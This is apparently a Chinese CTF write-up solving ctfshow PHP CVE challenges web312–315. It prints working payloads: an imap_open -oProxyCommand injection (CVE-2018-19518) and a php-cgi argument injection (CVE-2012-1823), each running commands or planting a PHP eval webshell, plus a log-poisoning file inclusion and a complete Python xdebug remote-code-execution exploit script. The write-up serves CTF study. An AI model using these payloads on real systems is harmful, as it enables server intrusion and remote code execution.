CTFSHOW PHPCVE复现

web312(CVE-2018-19518)

进入页面 

 抓包

发现是X-Powered-By: PHP/5.6.38  百度搜一下 发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 
如果启用了 rsh 和 ssh 功能并且 rsh 命令是 ssh 命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。 
成功的攻击可能允许攻击者绕过其他禁用的 exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意 shell 命令。 
imap_open(string $mailbox , string $username , string $password)函数中的mailbox是执行命令参数的一部分,所以我们可以通过更改邮箱名来进行命令注入执行

payload:

hostname=x+-oProxyCommand=echo echo '<?php eval($_POST[a])?>'>/var/www/html/1.php|base64 -d|sh}&username=11&password=11
编码之后:
||
\/
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbYV0pPz4nPi92YXIvd3d3L2h0bWwvMS5waHA%3d%3d|base64%09-d|sh}&username=11&password=11

 

web313(CVE-2012-1823)

漏洞介绍:

本漏洞 就是PHP-CGI 这个sapi出现的漏洞,php-cgi有两种运行方式 cgi和fastcgi 而本漏洞出现在CGI模式运行的php中。

这个漏洞简单来说就是用户请求的querystring 被作为了php-cgi的参数,最终导致了一系列的结果。

研究下原理 ,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。所以,Apache服务器按要求实现了这个功能。

漏洞利用:

cgi模式下有如下一些参数可用:

  • -c 指定php.ini文件的位置
  • -n 不要加载php.ini文件
  • -d 指定配置项
  • -b 启动fastcgi进程
  • -s 显示文件源码
  • -T 执行指定次该文件
  • -h-? 显示帮助

最简单的利用方式  就是 -s ,可以直接显示源码。

而fastcgi 还可以用到 更好的方法: 通过 -d  指定 auto_prepend_file 来制造任意文件包含漏洞。

在本题,先用 index.php?-s 看看源码。

可以直接用 -d 来 直接打

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php system('tac /somewhere/*')?>

参考文献:Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 | 离别歌

PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析 - 腾讯云开发者社区-腾讯云

web314

不算 CVE   算个小trick 。

<?php

error_reporting(0);

highlight_file(__FILE__);

//phpinfo
$file = $_GET['f'];

if(!preg_match('/\:/',$file)){
    include($file);
}
?f=/var/log/nginx/access.log

日志写上几句话木马<?php eval($_POST[1])?>,然后getshell

1=system('tac+/f*');

这里 包含seesion 文件应该也是可以的,这里直接用日志包含了

?f=/var/log/nginx/access.log

日志写上几句话木马<?php eval($_POST[1])?>,然后getshell

1=system('tac+/f*');

web315 (xdebug 远程代码执行)

如果服务器上开启了xdebug的调试,可能会导致被攻击者利用导致命令执行。

xdebug的攻击面 | Spoock

vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub

exp:

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')

在公网运行上面的脚本。 

python3 exp.py -t http://8731e14f-ee10-4df2-99f0-fef35075f5b3.challenge.ctf.show/index.php -c 'shell_exec("ls");'

 两个地址都没连 上去 ,就先搁置一边了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值